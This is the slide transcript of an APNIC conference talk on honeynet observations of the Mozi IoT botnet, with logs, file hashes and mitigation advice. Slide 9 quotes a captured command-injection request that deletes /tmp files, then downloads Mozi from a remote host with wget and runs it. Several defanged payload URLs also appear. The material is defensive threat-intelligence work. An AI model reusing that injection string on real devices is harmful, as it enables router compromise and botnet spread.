Diese Präsentation wurde erfolgreich gemeldet.
Die SlideShare-Präsentation wird heruntergeladen. ×

Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022

Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Anzeige
Wird geladen in …3
×

Hier ansehen

1 von 17 Anzeige

Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022

Herunterladen, um offline zu lesen

Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022, delivered on 14 December 2022.

Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022, delivered on 14 December 2022.

Anzeige
Anzeige

Weitere Verwandte Inhalte

Ähnlich wie Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022 (20)

Weitere von APNIC (20)

Anzeige

Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022

  1. 1. Observations from the APNIC Community Honeynet Project Adli Wahid Senior Internet Security Specialist APNIC adli@apnic.net || www.apnic.net 1
  2. 2. Let’s Connect! • LinkedIn: Adli Wahid • Email: adli@apnic.net 2
  3. 3. Discussion 1. Background 2. Mozi (IoT) Botnet 3. Observations 4. Mitigation & Remediation Note: credits to Anutsetsen Enkhzoright anutsetsen.e@khanbank.com for initial work on the research & presentation 3
  4. 4. Background (Source of Data) • APNIC Community Honeynet Project oCollaboration with partners across AP oIncluding capacity building related activities • Honeypots & Honeynet oAnything that interact with the honeypots is suspect oConfirmed with observed actions + artifacts (payload, logs, etc) • Types of Honeypots oTelnet/SSH (Cowrie) ** relevant for this talk o100++ sensors 4
  5. 5. What We Observe • Attacks that spread via o SSH & Telnet bruteforce o Exploiting _known_ vulnerabilities • Nature of o Malware - cryptominers, ddos agents, etc o Source of attack == infected devices* • Left of the Hack o Observations on attacker’s infrastructure o Bot recruitments o Scripts, malware payload, traffic • Attacks that no one pays attention to ☺ • Share feeds with network operators (DASH) & partners 5 DDoS Attack timeline Build/Buy Infrastructure • Write malware • Infect devices • Setup Command & Control “Left of the Hack” “The Hack”
  6. 6. Mozi Botnet • Discovered in September 2019 by Netlab • Significant outbreak in Sept 2020 (100k nodes) • Targets IoT devices (MIPs, ARM, PPC and x86) • Uses unique P2P Command & Control o BitTorrent Distributed Hash Table (DHT) as carrier protocol o Makes it robust & tricky* to track • Some capabilities (from config) o Perform a Ddos attack o Update executable from given URL o Execute command via shell or system() o DNS Spoofing o HTTP Session Hijacking (with JS) o Mining • Code base from other botnets o Gafgyt o Mirai • Propagation o 14 HTTP based exploits of via web interface of IoT Devices o Mainly Telnet**, FTP, SSH credentials brute-force 6
  7. 7. 7 Nmap scan report for host-x.static.[redacted].net (219.x.y.184) Host is up (0.062s latency). PORT STATE SERVICE VERSION 53387/tcp open elf-exe ELF 32-bit executable file This host was serving malware (http on port 53387). Shodan fingerprint the device as a DVR
  8. 8. Mozi Author ”taken custody” by LEA in 2021 https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/ Is it still around? 8
  9. 9. 2022 - Still Active? durian.fsck.my -- 93.56.202.158[10/Oct/2022:14:24:55 +0900] "GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*; wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear; sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0 Check your webserver logs for Mozi.a or Mozi.m 9
  10. 10. Observations in APNIC Honeynet Project • In 05/2022, we observed an ELF binary “.i” in some URLs o Post-login downloads • Pattern looks familiar http://xxx.xxx.xxx.xxx:random_port/.i • IP in URL can be the same as attacking host or different Source IP (attacking/spreading) IP hosting binary:random_port o2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766 o2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134 o2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724 o2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224 o2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764 o2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134 o2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273 10 1. Telnet username:password 2. wget http://x.x.x.x:nnnn/.1
  11. 11. The “.i” & Finding Mozi o .i: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, stripped • SHA256 a04ac6d98ad989312783d4fe3456c53730b212c79 a426fb215708b6c6daa3de3 o Known to VirusTotal • Finding Mozi • Maybe we can find Mozi.m or Mozi.a on the webserver? o If .i in $IP:PORT o Then download $IP:PORT/mozi.a || $IP:PORT/mozi.m || $IP:PORT/Mozi.m || $IP:PORT/Mozi.a || $IP:PORT/config 11
  12. 12. Observations – (hash) fingerprints :~/feeds/dload/20220601/50.83.145.125:43900$ sha256sum * .i a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m 9bcbb326a28b09faeb6fbfc0e7d68fe6ff79b7248c7b2510aa8dd11cc55e0356 Mozi.m b82e420c071c1c1a5cbf1ad8ba143f5b804a6fe4fd2fbcd28db20f471b7065ab .i ~/feeds/dload/20220601/222.103.181.173:1117$ sha256sum * .i 479768e26969e241244a475f97b1268fd02e303a8d6b5d15c71b552815cae14b mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.m 6d41f05fe458414332980d420e42b12d01bd21497631f5b6e60fc8082c170bed .i ~/feeds/dload/20221011/36.229.220.191:27611$ sha256sum * .i 23171f17aa39a4b7c9c492c9bc4668697f68e1863c77ef6502e38ca53860c2fa i b6d6ee5d756cfe9a9638769abef15294d7a9189ac49dc43d9b06fb04976b3bf5 mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 mozi.m b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 Mozi.m 289aba46ba734b2aef8a82dc983ef1451e303fc33c05820dd07cb7551ad1a310 .i 12
  13. 13. Slowly increasing last 7 months Daily Hits 13 Snapshot on 14/22/2022
  14. 14. IPs from AP Region (Last 7 Months) [Snippet] • 2022-12-12T23:57:24.533309,110.x.y.59,hxxp://110.x.y.59:43509/.i [Most Common] • 2022-08-30T11:07:19.374102,202.x.y.26,hxxp://61.a.b.131:58871/.i [Alternative] • 2022-10-18T12:34:38.452976,202.x.y.26,hxxp://219.a.b.184:53387/.i [Repeat Offender] 14 IPs from AP region by Operators 67%
  15. 15. Mitigation & Remediation (not just Mozi) • The Usual Advice oHarden Device – Patch, Strong Credentials, Access Controls ▪ But whose job is it anyways to monitor & remediate? ▪ Vulnerabilities sustain ‘old’ worm & bots oTL;DR – Same Story oThere must be a better way oResponding after the fact • Engagement with other stakeholders on the impact of insecure IoTs, Awareness, Policies, PSIRTs • Strengthen collaboration & the Eco-system 15
  16. 16. Thank You! Adli Wahid <adli@apnic.net> 16
  17. 17. Resources 1. https://blog.netlab.360.com/mozi-another-botnet-using-dht/ 2. https://blog.netlab.360.com/the-mostly-dead-mozi-and-its- lingering-bots/ 3. Mozi Tools - https://kn0wledge.fr/projects/mozitools/ 4. https://www.microsoft.com/security/blog/2021/08/19/how-to- proactively-defend-against-mozi-iot-botnet/ 5. ShadowServer Foundation - https://www.shadowserver.org/what- we-do/network-reporting/get-reports/ 6. APNIC DASH – https://dash.apnic.net 7. APNIC Community Honeynet Project – adli@apnic.net 17

×